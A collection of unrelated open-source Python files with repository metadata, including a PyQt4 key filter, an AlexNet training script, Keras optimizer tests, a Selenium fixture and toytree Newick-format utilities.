ed4d33d1bcc71eb5f497b3cfed52d1fed48b0a7a
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import PyQt4
import PyQt4.QtCore as QtCore
import PyQt4.QtGui as QtGui
class FilterReturn(QtCore.QObject):
def eventFilter(self, source, event):
if (event.type()==QEvent.KeyPress):
key = event.key()
if key==Qt.Key_Return or key==Qt.Key_Enter:
source.emit(SIGNAL("enterPressed()"))
return QtGui.QWidget.eventFilter(self, source, event)
class FilterESC(QtCore.QObject):
def eventFilter(self, source, event):
if (event.type()==QEvent.KeyPress):
key = event.key()
#print('KEY:', key)
#print('ESC:', Qt.Key_Escape)
if key==Qt.Key_Escape:
source.emit(SIGNAL("ESCPressed()"))
return QtGui.QWidget.eventFilter(self, source, event)
| 31.241379
| 61
| 0.61479
|
4a18e2df26127f6c931bd0d7d37672a573a3cc12
| 2,309
|
py
|
Python
|
train.py
|
lgchencong/AlexNet
|
6d420d5384c04ba56bb17e84b0a3a3ee2acf99e9
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
lgchencong/AlexNet
|
6d420d5384c04ba56bb17e84b0a3a3ee2acf99e9
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
lgchencong/AlexNet
|
6d420d5384c04ba56bb17e84b0a3a3ee2acf99e9
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from torch import optim
from torchvision import transforms, datasets
from model import AlexNet
from torch.utils.data import DataLoader
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
batch_size = 32
print(device)
data_transform = {
"train": transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(0.5, 0.5, 0.5), (0.5, 0.5, 0.5)]),
"val": transforms.Compose([transforms.Resize((224, 224)), # cannot 224, must (224, 224)
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
}
image_path = 'data/'
print(data_transform["train"])
train_datasets = datasets.ImageFolder(root=image_path + 'train', transform=transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(0.5, 0.5, 0.5), (0.5, 0.5, 0.5)]))
val_datasets = datasets.ImageFolder(root=image_path + 'val', transform=data_transform["val"])
train_loader = DataLoader(train_datasets, batch_size=batch_size, shuffle=True, num_workers=0)
val_loader = DataLoader(val_datasets, batch_size=batch_size, shuffle=True, num_workers=0)
net = AlexNet(num_classes=5, init_weights=True)
net.to(device)
loss_function = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.01)
save_path = './AlexNet.pth'
for epoch in range(3):
# train
net.train() # 训练过程中,使用之前定义网络中的dropout
running_loss = 0.0
for step, data in enumerate(train_loader, start=0):
images, labels = data
optimizer.zero_grad()
outputs = net(images.to(device))
loss = loss_function(outputs, labels.to(device))
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
# print train process
rate = (step + 1) / len(train_loader)
a = "*" * int(rate * 50)
b = "." * int((1 - rate) * 50)
print("\rtrain loss: {:^3.0f}%[{}->{}]{:.3f}".format(int(rate * 100), a, b, loss), end="")
| 41.981818
| 99
| 0.61845
|
4a18e32a7c16c0689b21f566639387331abda70e
| 1,072
|
py
|
Python
|
examples/robotchef/docs/source/conf.py
|
pgajdos/lml
|
047bad491a25192d0d3816103b6b47e7374cc5a1
|
[
"BSD-3-Clause"
] | null | null | null |
examples/robotchef/docs/source/conf.py
|
pgajdos/lml
|
047bad491a25192d0d3816103b6b47e7374cc5a1
|
[
"BSD-3-Clause"
] | null | null | null |
examples/robotchef/docs/source/conf.py
|
pgajdos/lml
|
047bad491a25192d0d3816103b6b47e7374cc5a1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
DESCRIPTION = "Sample project to demonstrate load me later plugin system" + ""
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.intersphinx",
"sphinx.ext.viewcode",
]
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = u"robotchef"
copyright = u"2017 Onni Software Ltd."
version = "0.0.1"
release = "0.0.1"
exclude_patterns = []
pygments_style = "sphinx"
html_theme = "default"
html_static_path = ["_static"]
htmlhelp_basename = "robotchefdoc"
latex_elements = {}
latex_documents = [
(
"index",
"robotchef.tex",
"robotchef Documentation",
"Onni Software Ltd.",
"manual",
)
]
man_pages = [
(
"index",
"robotchef",
"robotchef Documentation",
[u"Onni Software Ltd."],
1,
)
]
texinfo_documents = [
(
"index",
"robotchef",
"robotchef Documentation",
"Onni Software Ltd.",
"robotchef",
DESCRIPTION,
"Miscellaneous",
)
]
| 20.226415
| 78
| 0.584888
|
4a18e34095c646354c7d192e1316efb67b1dd64b
| 1,840
|
py
|
Python
|
test/test_user_commons/test_sensor.py
|
MarcinMoskala/biggerquery
|
54bcf1b289854709fc7d430fb8ac347ce84ed7b9
|
[
"Apache-2.0"
] | null | null | null |
test/test_user_commons/test_sensor.py
|
MarcinMoskala/biggerquery
|
54bcf1b289854709fc7d430fb8ac347ce84ed7b9
|
[
"Apache-2.0"
] | null | null | null |
test/test_user_commons/test_sensor.py
|
MarcinMoskala/biggerquery
|
54bcf1b289854709fc7d430fb8ac347ce84ed7b9
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from unittest import main
import pandas as pd
import mock
from biggerquery.user_commons.sensor import sensor_component
YESTERDAY_WHERE_CLAUSE = "DATE(%(partitioning_column)s) = DATE(TIMESTAMP_ADD(TIMESTAMP('{dt} UTC'), INTERVAL -24 HOUR))"
def return_table_not_ready(*args, **kwargs):
return pd.DataFrame([{'table_ready': 0}])
def return_table_ready(*args, **kwargs):
return pd.DataFrame([{'table_ready': 1}])
class SensorComponentTestCase(TestCase):
def test_should_generate_component_name_based_on_table_alias(self):
# given
dataset = mock.Mock()
sensor = sensor_component('some_table', YESTERDAY_WHERE_CLAUSE, ds=dataset)
# expect
self.assertEqual(sensor._standard_component.__name__, 'wait_for_some_table')
def test_should_raise_error_when_query_result_is_empty(self):
# given
dataset = mock.Mock()
dataset.collect.side_effect = return_table_not_ready
sensor = sensor_component('some_table', YESTERDAY_WHERE_CLAUSE, ds=dataset)
# expect
with self.assertRaises(ValueError):
sensor(ds=dataset)
def test_should_generate_query_based_on_where_clause_and_table_alias(self):
# given
dataset = mock.Mock()
sensor = sensor_component('some_table', YESTERDAY_WHERE_CLAUSE % {
'partitioning_column': 'partition'
}, ds=dataset)
dataset.collect.side_effect = return_table_ready
# when
sensor(ds=dataset)
# then
dataset.collect.assert_called_once_with(sql='''
SELECT count(*) > 0 as table_ready
FROM `{some_table}`
WHERE DATE(partition) = DATE(TIMESTAMP_ADD(TIMESTAMP('{dt} UTC'), INTERVAL -24 HOUR))
''', custom_run_datetime=None)
if __name__ == '__main__':
main()
| 31.724138
| 120
| 0.691304
|
4a18e36e1dd053c07c244872f560fcda82f4e797
| 972
|
py
|
Python
|
fixture/application.py
|
fastmelodic/PythonQA
|
964ed27d812a2f4927784d18e4d44c86fac43ac9
|
[
"Apache-2.0"
] | null | null | null |
fixture/application.py
|
fastmelodic/PythonQA
|
964ed27d812a2f4927784d18e4d44c86fac43ac9
|
[
"Apache-2.0"
] | null | null | null |
fixture/application.py
|
fastmelodic/PythonQA
|
964ed27d812a2f4927784d18e4d44c86fac43ac9
|
[
"Apache-2.0"
] | null | null | null |
from selenium import webdriver
from fixture.session import SessionHelper
from fixture.group import GroupHelper
from fixture.contact import ContactHelper
class Application:
def __init__(self, browser, baseurl):
if browser == "firefox":
self.wd = webdriver.Firefox()
elif browser == "chrome":
self.wd = webdriver.Chrome()
elif browser == "ie":
self.wd = webdriver.Ie()
else:
raise ValueError("Unrecognized browser %s" % browser)
self.wd.implicitly_wait(1)
self.session = SessionHelper(self)
self.group = GroupHelper(self)
self.contact = ContactHelper(self)
self.baseurl = baseurl
def is_valid(self):
try:
self.wd.current_url
return True
except:
return False
def enter_home_page(self):
wd = self.wd
wd.get(self.baseurl)
def destroy(self):
self.wd.quit()
| 27
| 65
| 0.599794
|
4a18e4a6111d89ab085e6daaefa074833979815d
| 18,116
|
py
|
Python
|
keras/optimizers/optimizer_experimental/optimizer_test.py
|
hdubbs/keras
|
4967ce6f8f0199969ba40d74eba1bddc204ca100
|
[
"Apache-2.0"
] | null | null | null |
keras/optimizers/optimizer_experimental/optimizer_test.py
|
hdubbs/keras
|
4967ce6f8f0199969ba40d74eba1bddc204ca100
|
[
"Apache-2.0"
] | null | null | null |
keras/optimizers/optimizer_experimental/optimizer_test.py
|
hdubbs/keras
|
4967ce6f8f0199969ba40d74eba1bddc204ca100
|
[
"Apache-2.0"
] | null | null | null |
"""Tests for the reworked optimizer.
More context in go/new-keras-optimizer
"""
import os
import re
from absl import logging
from absl.testing import parameterized
import keras
from keras.optimizers import learning_rate_schedule
from keras.optimizers.optimizer_experimental import adadelta as adadelta_new
from keras.optimizers.optimizer_experimental import adagrad as adagrad_new
from keras.optimizers.optimizer_experimental import adam as adam_new
from keras.optimizers.optimizer_experimental import adamw as adamw_new
from keras.optimizers.optimizer_experimental import rmsprop as rmsprop_new
from keras.optimizers.optimizer_experimental import sgd as sgd_new
from keras.optimizers.optimizer_v2 import adadelta as adadelta_old
from keras.optimizers.optimizer_v2 import adagrad as adagrad_old
from keras.optimizers.optimizer_v2 import adam as adam_old
from keras.optimizers.optimizer_v2 import gradient_descent as sgd_old
from keras.optimizers.optimizer_v2 import rmsprop as rmsprop_old
from keras.utils import losses_utils
import numpy as np
import tensorflow.compat.v2 as tf
ds_combinations = tf.__internal__.distribute.combinations
STRATEGIES = [
# TODO(b/202992598): Add PSS strategy once the XLA issues is resolved.
ds_combinations.one_device_strategy,
ds_combinations.mirrored_strategy_with_cpu_1_and_2,
ds_combinations.mirrored_strategy_with_two_gpus,
ds_combinations.tpu_strategy,
ds_combinations.cloud_tpu_strategy,
ds_combinations.multi_worker_mirrored_2x1_cpu,
ds_combinations.multi_worker_mirrored_2x2_gpu,
ds_combinations.central_storage_strategy_with_two_gpus,
]
adadelta_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladadelta",
lambda: adadelta_new.Adadelta( # pylint: disable=g-long-lambda
0.002,
use_ema=True,
ema_overwrite_frequency=None))
adagrad_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladagrad", lambda: adagrad_new.Adagrad(0.002))
adam_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladam", lambda: adam_new.Adam(0.002))
adamw_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentaladamw", lambda: adamw_new.AdamW(0.002, weight_decay=0.004))
rmsprop_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentalrmsprop", lambda: rmsprop_new.RMSprop(0.002))
sgd_new_fn = tf.__internal__.test.combinations.NamedObject(
"experimentalsgdaverage",
lambda: sgd_new.SGD( # pylint: disable=g-long-lambda
0.002,
use_ema=True,
ema_overwrite_frequency=1))
OPTIMIZER_FN = [
adadelta_new_fn,
adagrad_new_fn,
adam_new_fn,
adamw_new_fn,
rmsprop_new_fn,
sgd_new_fn,
]
class OptimizerFuntionalityTest(tf.test.TestCase, parameterized.TestCase):
"""Test the functionality of optimizer."""
def testAddVariableFromReference(self):
optimizer = adam_new.Adam()
variable = optimizer.add_variable_from_reference(
tf.Variable(1.0, name="tmp"), "test")
self.assertEqual(variable._shared_name, "test/tmp")
self.assertEqual(self.evaluate(variable), 0)
def testBuildIndexDict(self):
optimizer = adam_new.Adam()
var_list = [tf.Variable(0, name=f"var{i}") for i in range(10)]
optimizer._build_index_dict(var_list)
self.assertEqual(optimizer._index_dict[optimizer._var_key(var_list[7])], 7)
def testClipNorm(self):
optimizer = adam_new.Adam(clipnorm=1)
grad = [tf.convert_to_tensor([100.0, 100.0])]
clipped_grad = optimizer._clip_gradients(grad)
self.assertAllClose(clipped_grad[0], [2**0.5 / 2, 2**0.5 / 2])
def testClipValue(self):
optimizer = adam_new.Adam(clipvalue=1)
grad = [tf.convert_to_tensor([100.0, 100.0])]
clipped_grad = optimizer._clip_gradients(grad)
self.assertAllEqual(clipped_grad[0], [1.0, 1.0])
def testClipGlobalNorm(self):
optimizer = adam_new.Adam(global_clipnorm=1)
grad = [
tf.cast([100.0, 100.0], dtype=tf.float32),
tf.cast([100.0, 100.0], dtype=tf.float32)
]
clipped_grad = optimizer._clip_gradients(grad)
self.assertAllClose(clipped_grad[0], [0.5, 0.5])
def testPassingLegacyArgsRaiseWarning(self):
with self.assertLogs(level="WARNING") as log_output:
logging.set_verbosity(logging.WARNING)
_ = adam_new.Adam(clipnorm=1, decay=0.5)
expected_log = "decay is deprecated in"
output = log_output[0][0].message
self.assertTrue(re.search(expected_log, output))
def testPassingLegacyClipnorm(self):
optimizer = adam_new.Adam(clipnorm=1)
self.assertEqual(optimizer._clipnorm, 1)
def testReturnAllOptimizerVariables(self):
x = tf.Variable([[1.0, 2.0], [3.0, 4.0]], dtype=tf.float32)
optimizer = adam_new.Adam()
grads = tf.convert_to_tensor([[1.0, 2.0], [3.0, 4.0]])
optimizer.apply_gradients(zip([grads], [x]))
optimizer_variables = optimizer.variables
all_names = [var._shared_name for var in optimizer_variables]
self.assertLen(optimizer_variables, 4)
self.assertCountEqual(
all_names,
["iteration", "learning_rate", "Adam/m/Variable", "Adam/v/Variable"])
def testSetLearningRate(self):
optimizer = adam_new.Adam(learning_rate=1.0)
self.assertIsInstance(optimizer._learning_rate, tf.Variable)
self.assertEqual(self.evaluate(optimizer.learning_rate), 1.0)
optimizer.learning_rate = 2.0
self.assertEqual(self.evaluate(optimizer.learning_rate), 2.0)
# Test the legacy setter.
optimizer.lr = 3.0
self.assertEqual(self.evaluate(optimizer.learning_rate), 3.0)
lr_schedule = learning_rate_schedule.ExponentialDecay(
initial_learning_rate=1e-2, decay_steps=10000, decay_rate=0.9)
optimizer = adam_new.Adam(learning_rate=lr_schedule)
self.assertIsInstance(optimizer._learning_rate,
learning_rate_schedule.ExponentialDecay)
self.assertEqual(optimizer.learning_rate, 0.01)
# Test the legacy property.
self.assertEqual(optimizer.lr, 0.01)
x = tf.Variable([1.0, 2.0], dtype=tf.float32)
grads = tf.convert_to_tensor([1.0, 2.0])
for _ in range(2):
optimizer.apply_gradients(zip([grads], [x]))
self.assertTrue(optimizer.learning_rate < 0.01 and
optimizer.learning_rate > 0.00999)
with self.assertRaisesRegex(TypeError, "This optimizer was created with*"):
optimizer.learning_rate = 2.0
def testSetIterations(self):
optimizer = adam_new.Adam()
optimizer.iterations = tf.Variable(2, dtype=tf.int32)
self.assertEqual(optimizer.iterations, 2)
var_list = [tf.Variable(2.0), tf.Variable(2.0)]
grads = tf.convert_to_tensor([1.0, 1.0])
optimizer.apply_gradients(zip(grads, var_list))
self.assertEqual(optimizer.iterations, 3)
with self.assertRaisesRegex(RuntimeError, "Cannot set*"):
optimizer.iterations = 2
def testPassingMissingWDError(self):
with self.assertRaises(ValueError):
_ = adamw_new.AdamW(0.01, weight_decay=None)
with self.assertRaisesRegex(ValueError, "Missing value of"):
_ = adamw_new.AdamW(0.01, weight_decay=None)
def testMovingAverageOptimizer(self):
optimizer = sgd_new.SGD(
learning_rate=1,
use_ema=True,
ema_momentum=0.5,
ema_overwrite_frequency=3)
var1, var2 = tf.Variable(2.0), tf.Variable(2.0)
with tf.GradientTape() as tape:
loss = var1 + var2
grads = tape.gradient(loss, [var1, var2])
# First iteration: [var1, var2] = [1.0, 1.0]
optimizer.apply_gradients(zip(grads, [var1, var2]))
self.assertAllEqual([var1.numpy(), var2.numpy()], [1.0, 1.0])
# Second iteration: [var1, var2] = [0.0, 0.0]
optimizer.apply_gradients(zip(grads, [var1, var2]))
self.assertAllEqual([var1.numpy(), var2.numpy()], [0.0, 0.0])
# Third iteration, without EMA, we should see [var1, var2] = [-1.0, -1.0],
# but overwriting results in [var1, var2] = [-0.125, -0.125].
optimizer.apply_gradients(zip(grads, [var1, var2]))
self.assertAllEqual([var1.numpy(), var2.numpy()], [-0.125, -0.125])
def testGetAndFromConfig(self):
optimizer = adam_new.Adam(
learning_rate=np.float64(0.05),
beta_1=0.7,
beta_2=0.77,
amsgrad=True,
epsilon=0.001,
clipnorm=0.5,
use_ema=True,
ema_momentum=0.5,
ema_overwrite_frequency=50)
config = optimizer.get_config()
self.assertDictEqual(
config, {
"learning_rate": np.float32(0.05),
"beta_1": 0.7,
"beta_2": 0.77,
"epsilon": 0.001,
"amsgrad": True,
"clipnorm": 0.5,
"global_clipnorm": None,
"clipvalue": None,
"use_ema": True,
"ema_momentum": 0.5,
"ema_overwrite_frequency": 50,
"jit_compile": False,
})
restored_optimizer = adam_new.Adam.from_config(config)
self.assertDictEqual(restored_optimizer.get_config(),
optimizer.get_config())
def testCheckpointOptimizer(self):
x = tf.Variable([[1.0, 2.0], [3.0, 4.0]], dtype=tf.float32)
lr_schedule = learning_rate_schedule.ExponentialDecay(
initial_learning_rate=1e-2, decay_steps=10000, decay_rate=0.9)
optimizer_1 = adam_new.Adam(
learning_rate=lr_schedule, beta_1=0.8, beta_2=0.888)
grads = tf.convert_to_tensor([[1.0, 2.0], [3.0, 4.0]])
for _ in range(1):
optimizer_1.apply_gradients(zip([grads], [x]))
# Then save the variable and optimizer to a checkpoint.
checkpoint_1 = tf.train.Checkpoint(var=x, optimizer=optimizer_1)
checkpoint_path = checkpoint_1.save(self.get_temp_dir())
# Create a new optimizer and call restore on it (and x)
x2 = tf.Variable([[0., 0.], [0., 0.]], dtype=x.dtype)
optimizer_2 = adam_new.Adam(learning_rate=0.02, beta_1=0.7, beta_2=0.777)
optimizer_2.build([x2])
checkpoint_2 = tf.train.Checkpoint(var=x2, optimizer=optimizer_2)
checkpoint_2.restore(checkpoint_path)
self.assertTrue(
(self.evaluate(optimizer_1._momentums._storage[0]) == self.evaluate(
optimizer_2._momentums._storage[0])).all())
self.assertEqual(
self.evaluate(optimizer_1._iterations),
self.evaluate(optimizer_2._iterations))
@parameterized.product(optimizer_fn=OPTIMIZER_FN)
def testSaveAndLoadOptimizerWithModel(self, optimizer_fn):
model = keras.Sequential(
[keras.layers.Input(shape=(1,)),
keras.layers.Dense(1)])
optimizer = optimizer_fn()
optimizer._clipnorm = 0.1
x = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
y = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
model.compile(loss="mse", optimizer=optimizer)
model.fit(x, y)
# Save in h5 format.
path = os.path.join(self.get_temp_dir(), "model.h5")
model.save(path)
loaded_model = keras.models.load_model(path)
loaded_model.load_weights(path)
loaded_optimizer = loaded_model.optimizer
self.assertEqual(type(optimizer), type(loaded_optimizer))
self.assertEqual(loaded_optimizer.learning_rate, 0.002)
self.assertEqual(loaded_optimizer._clipnorm, 0.1)
# Save in Keras SavedModel format.
model.fit(x, y)
path = os.path.join(self.get_temp_dir(), "model")
model.save(path)
loaded_model = keras.models.load_model(path)
loaded_model.load_weights(path)
loaded_optimizer = loaded_model.optimizer
self.assertEqual(type(optimizer), type(loaded_optimizer))
self.assertEqual(loaded_optimizer.learning_rate, 0.002)
self.assertEqual(loaded_optimizer._clipnorm, 0.1)
class OptimizerRegressionTest(tf.test.TestCase, parameterized.TestCase):
"""Test optimizer outputs the same numerical results as optimizer_v2."""
def _compare_numerical(self, old_optimizer, new_optimizer):
x1 = tf.Variable(np.ones([10]), dtype=tf.float64)
x2 = tf.Variable(np.ones([10]), dtype=tf.float64)
grads = tf.convert_to_tensor(np.arange(0.1, 1.1, 0.1))
sparse_grads = tf.IndexedSlices(
tf.convert_to_tensor([0, 0.2, 0.4, 0.8], dtype=tf.float64),
[0, 2, 4, 6],
dense_shape=[len(grads)])
for _ in range(5):
self.assertAllClose(x1, x2)
old_optimizer.apply_gradients(zip([grads], [x1]))
new_optimizer.apply_gradients(zip([grads], [x2]))
for _ in range(5):
self.assertAllClose(x1, x2)
old_optimizer.apply_gradients(zip([sparse_grads], [x1]))
new_optimizer.apply_gradients(zip([sparse_grads], [x2]))
def testAdam(self):
self._compare_numerical(
adam_old.Adam(amsgrad=True), adam_new.Adam(amsgrad=True))
def testAdadelta(self):
self._compare_numerical(adadelta_old.Adadelta(), adadelta_new.Adadelta())
def testAdagrad(self):
self._compare_numerical(adagrad_old.Adagrad(), adagrad_new.Adagrad())
def testRMSprop(self):
self._compare_numerical(rmsprop_new.RMSprop(), rmsprop_old.RMSprop())
@parameterized.product(nesterov=[True, False])
def testSgd(self, nesterov):
self._compare_numerical(
sgd_old.SGD(nesterov=True), sgd_new.SGD(nesterov=True))
class DistributedTrainingTest(tf.test.TestCase, parameterized.TestCase):
@ds_combinations.generate(
tf.__internal__.test.combinations.combine(
strategy=STRATEGIES, optimizer_fn=OPTIMIZER_FN))
def testGetGradientsInModel(self, strategy, optimizer_fn):
with strategy.scope():
model = keras.Sequential(
[keras.layers.Input(shape=(1,)),
keras.layers.Dense(1)])
optimizer = optimizer_fn()
x = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
y = tf.expand_dims(tf.convert_to_tensor([1, 1, 1, 0, 0, 0]), axis=1)
model.compile(loss="mse", optimizer=optimizer)
model.fit(x, y, epochs=1, steps_per_epoch=5)
if optimizer._name == "Adam":
# Assert the momentum variable is not 0.
self.assertNotEqual(self.evaluate(optimizer._momentums._storage[0]), 0)
elif optimizer._name == "Adadelta":
# Assert the accumulated variable is not 0.
self.assertNotEqual(
self.evaluate(optimizer._accumulated_grads._storage[0]), 0)
elif optimizer._name == "Adagrad":
# Assert the accumulated variable is not 0.
self.assertNotEqual(self.evaluate(optimizer._accumulators._storage[0]), 0)
@ds_combinations.generate(
tf.__internal__.test.combinations.combine(
strategy=STRATEGIES, optimizer_fn=OPTIMIZER_FN))
def testGetGradientsInCustomTrainingLoop(self, strategy, optimizer_fn):
with strategy.scope():
model = keras.Sequential(
[keras.layers.Input(shape=(1,)),
keras.layers.Dense(1)])
optimizer = optimizer_fn()
def per_worker_dataset_fn():
def dataset_fn(_):
x, y = [1, 1, 1, 0, 0, 0], [1, 1, 1, 0, 0, 0]
ds = tf.data.Dataset.from_tensor_slices((x, y))
ds = ds.repeat().batch(6)
return ds
return strategy.distribute_datasets_from_function(dataset_fn)
ds = per_worker_dataset_fn()
@tf.function
def train_step(ds):
def replica_fn(data):
features, labels = data
with tf.GradientTape() as tape:
output = model(tf.expand_dims(features, axis=1))
loss = keras.losses.MeanSquaredError(
reduction=losses_utils.ReductionV2.NONE)(labels, output)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
strategy.run(replica_fn, args=(next(iter(ds)),))
for _ in range(3):
train_step(ds)
self.assertEqual(self.evaluate(optimizer.iterations), 3)
@ds_combinations.generate(
tf.__internal__.test.combinations.combine(strategy=[
ds_combinations.mirrored_strategy_with_two_gpus,
ds_combinations.tpu_strategy,
ds_combinations.multi_worker_mirrored_2x2_gpu,
ds_combinations.central_storage_strategy_with_two_gpus,
]))
def testJitCompile(self, strategy):
# Test the optimizer yields same numerical results when jit_compile is
# on and off.
with strategy.scope():
optimizer_1 = adam_new.Adam(use_ema=True, ema_overwrite_frequency=1)
optimizer_2 = adam_new.Adam(
jit_compile=True, use_ema=True, ema_overwrite_frequency=1)
model_1 = keras.Sequential([
keras.layers.Input(shape=(2,)),
keras.layers.Dense(5),
keras.layers.Dense(1)
])
model_2 = keras.models.clone_model(model_1)
model_2.set_weights(model_1.get_weights())
def per_worker_dataset_fn():
def dataset_fn(_):
x = np.random.rand(6, 2)
y = [1, 1, 1, 0, 0, 0]
ds = tf.data.Dataset.from_tensor_slices((x, y))
ds = ds.repeat().batch(6)
return ds
return strategy.distribute_datasets_from_function(dataset_fn)
ds = per_worker_dataset_fn()
@tf.function
def train_step(ds):
def replica_fn(data):
features, labels = data
with tf.GradientTape() as tape:
output_1 = model_1(features)
loss_1 = keras.losses.MeanSquaredError(
reduction=losses_utils.ReductionV2.NONE)(labels, output_1)
grads_1 = tape.gradient(loss_1, model_1.trainable_variables)
optimizer_1.apply_gradients(zip(grads_1, model_1.trainable_variables))
with tf.GradientTape() as tape:
output_2 = model_2(features)
loss_2 = keras.losses.MeanSquaredError(
reduction=losses_utils.ReductionV2.NONE)(labels, output_2)
grads_2 = tape.gradient(loss_2, model_2.trainable_variables)
optimizer_2.apply_gradients(zip(grads_2, model_2.trainable_variables))
strategy.run(replica_fn, args=(next(iter(ds)),))
for _ in range(3):
train_step(ds)
self.assertAllClose(model_1.trainable_variables[0][0],
model_2.trainable_variables[0][0])
if __name__ == "__main__":
tf.__internal__.distribute.multi_process_runner.test_main()
| 38.544681
| 80
| 0.690991
|
4a18e59bcd86169a0ab3d6496797d913e0b698e1
| 10,195
|
py
|
Python
|
toytree/utils.py
|
PhilippineDubertrand/toytree
|
cdb57fae164f0035dc5f451e08289780deae927a
|
[
"BSD-3-Clause"
] | null | null | null |
toytree/utils.py
|
PhilippineDubertrand/toytree
|
cdb57fae164f0035dc5f451e08289780deae927a
|
[
"BSD-3-Clause"
] | null | null | null |
toytree/utils.py
|
PhilippineDubertrand/toytree
|
cdb57fae164f0035dc5f451e08289780deae927a
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function, division, absolute_import
import re
from copy import deepcopy
import numpy as np
#######################################################
# Exception Classes
#######################################################
class ToytreeError(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
class TreeError(Exception):
"A problem occurred during a TreeNode operation"
def __init__(self, value=''):
self.value = value
def __str__(self):
return repr(self.value)
# TREE FORMATS
NW_FORMAT = {
# flexible with support
# Format 0 = (A:0.35,(B:0.72,(D:0.60,G:0.12)1.00:0.64)1.00:0.56);
0: [
('name', str, True),
('dist', float, True),
('support', float, True),
('dist', float, True),
],
# flexible with internal node names
# Format 1 = (A:0.35,(B:0.72,(D:0.60,G:0.12)E:0.64)C:0.56);
1: [
('name', str, True),
('dist', float, True),
('name', str, True),
('dist', float, True),
],
# strict with support values
# Format 2 = (A:0.35,(B:0.72,(D:0.60,G:0.12)1.00:0.64)1.00:0.56);
2: [
('name', str, False),
('dist', float, False),
('support', str, False),
('dist', float, False),
],
# strict with internal node names
# Format 3 = (A:0.35,(B:0.72,(D:0.60,G:0.12)E:0.64)C:0.56);
3: [
('name', str, False),
('dist', float, False),
('name', str, False),
('dist', float, False),
],
# strict with internal node names
# Format 4 = (A:0.35,(B:0.72,(D:0.60,G:0.12)));
4: [
('name', str, False),
('dist', float, False),
(None, None, False),
(None, None, False),
],
# Format 5 = (A:0.35,(B:0.72,(D:0.60,G:0.12):0.64):0.56);
5: [
('name', str, False),
('dist', float, False),
(None, None, False),
('dist', float, False),
],
# Format 6 = (A:0.35,(B:0.72,(D:0.60,G:0.12)E)C);
6: [
('name', str, False),
(None, None, False),
(None, None, False),
('dist', float, False),
],
# Format 7 = (A,(B,(D,G)E)C);
7: [
('name', str, False),
('dist', float, False),
('name', str, False),
(None, None, False),
],
# Format 8 = (A,(B,(D,G)));
8: [
('name', str, False),
(None, None, False),
('name', str, False),
(None, None, False),
],
# Format 9 = (,(,(,)));
9: [
('name', str, False),
(None, None, False),
(None, None, False),
(None, None, False),
],
# Format 10 = ((a[&Z=1,Y=2]:1.0[&X=3], b[&Z=1,Y=2]:3.0[&X=2]):1.0[&L=1,W=0], ...
# NHX Like mrbayes NEXUS common
10: [
('name', str, True),
('dist', str, True),
('name', str, True),
('dist', str, True),
]
}
# class TreeInference:
# - get distance matrix (from an input data set... phy, nex)
# - ----- create a class to store DNA matrix (pandas colored)
# - NJ tree infer
# ------ uses distance matrix
# - UPGMA tree infer
# ------ uses distance matrix
#class TreeMoves:
# def move_spr(self):
# """
# Sub-tree pruning and Regrafting.
# Select one edge randomly from the tree and split on that edge to create
# two subtrees. Attach one of the subtrees (e.g., the smaller one)
# randomly to the larger tree to create a new node.
# ... does SPR break edges connected to root when tree is real rooted?
# """
# pass
# # On rooted trees we can work with nodes easier than edges. Start by
# # selected a node at random that is not root.
# # nodes = [i for i in self.ttree.tree.traverse() if not i.is_root()]
# # rnode = nodes[random.randint(0, len(nodes) - 1)]
# # # get all edges on the tree, skip last one which is non-real root edge
# # edges = self.ttree.tree.get_edges()[:-1]
# # # select a random edge
# # redge = edges[random.randint(0, len(edges))]
# # # break into subtrees
# # tre1 = self.tree.prune(self.tree.get_common_ancestor(redge[0]).idx)
# # tre2 = self.tree.prune(self.tree.get_common_ancestor(redge[1]).idx)
# def move_tbr(self):
# pass
# def move_nni(self):
# pass
# def non_parametric_rate_smoothing(self):
# """
# Non-parametric rate smooting.
# A method for estimating divergence times when evolutionary rates are
# variable across lineages by minimizing ancestor-descendant local rate
# changes. According to Sanderson this method is motivated by the
# likelihood that evolutionary rates are autocorrelated in time.
# returns Toytree
# """
# # p is a fixed exponent
# p = 2
# W = []
# for node in self.ttree.traverse():
# if not node.is_leaf():
# children = node.children
# ks = []
# for child in children:
# dist = abs(node.dist - child.dist)
# ks.append(dist ** p)
# W.append(sum(ks))
# # root rate is mean of all descendant rates --
# # n is the number of edges (rates) (nnodes - 1 for root)
# r_root = np.mean(W)
# rootw = []
# for child in self.ttree.tree.children:
# rootw.append((r_rroot - child.dist) ** p)
# w_root = sum(rootw)
# W.append(w_root)
# k = []
# for
# k = sum( np.exp(abs(ri - rj), p) )
# W = sum(k)
# def penalized_likelihood(...):
# pass
#
# def wfunc(ttree, p):
# ws = []
